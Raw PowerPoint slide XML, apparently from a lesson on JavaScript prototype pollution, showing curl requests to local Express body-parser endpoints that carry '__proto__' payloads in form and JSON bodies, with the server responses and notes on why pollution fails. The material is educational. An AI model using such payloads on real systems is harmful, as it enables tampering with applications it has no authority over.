            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" -d "key=value" -d "nested[key]=value" -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__=test"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test[__proto__]=test"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HTTP/1.1 200 OK</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X-Powered-By: Express</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Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; charset=utf-8</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Content-Length: 64</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ETag: W/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"40-i/stjZaJc1re5/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TWdILResfwwOo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>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Date: Sun, 05 May 2024 08:13:02 GMT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Connection: keep-alive</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Keep-Alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: timeout=5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:b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"body"</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key"</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"value"</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"nested</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key"</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"value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test":{}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:"[object Object]"}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Similar to the previous slide, but the payload is sent as data instead of via the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Consult </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> documentation for more syntax: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/ljharb/qs#readme</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Unfortunately, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> are also ignored by default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313688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000" dirty="0"/>
              <a:t>Inputting objects: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unextended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="20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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -X POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://localhost/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded</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unextended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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlencoded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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"key=value"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"nested[key]=value"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__=test"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test[__proto__]=test"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HTTP/1.1 200 OK</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X-Powered-By: Express</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Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; charset=utf-8</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Content-Length: 109</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ETag: W/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"6d-4LuHprNum+n8vN4PKyXdAuZ8B9M"</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Date: Sun, 05 May 2024 09:19:37 GMT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Connection: keep-alive</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Keep-Alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: timeout=5</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"body"</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key"</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"value"</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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"nested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[key]"</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value"</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"__proto__"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test"</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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[__proto__]"</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"test"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00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prototype"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highligh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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Similar to previous slide, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>nested objects are unsupported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>The topmost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> property</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> do get set, but we can only set it to a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Also, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>prototype of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>req.body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, so simply sending a request cannot pollute the prototype</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16410469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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"/body-parser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -X POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://localhost/body-parser/</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--data-raw </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'{"key": "value", "nested": {"key": "value"}, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__": "test"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, "test": {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__": ["test"]</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HTTP/1.1 200 OK</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X-Powered-By: Express</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Content-Type: application/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; charset=utf-8</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Content-Length: 126</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ETag: W/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"7e-1jI2sJlwwvgtKOgFDDiBOnp3UVY"</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Date: Sun, 05 May 2024 09:42:21 GMT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Connection: keep-alive</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Keep-Alive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: timeout=5</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"body"</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key"</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"value"</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"nested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key"</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"value</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"__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
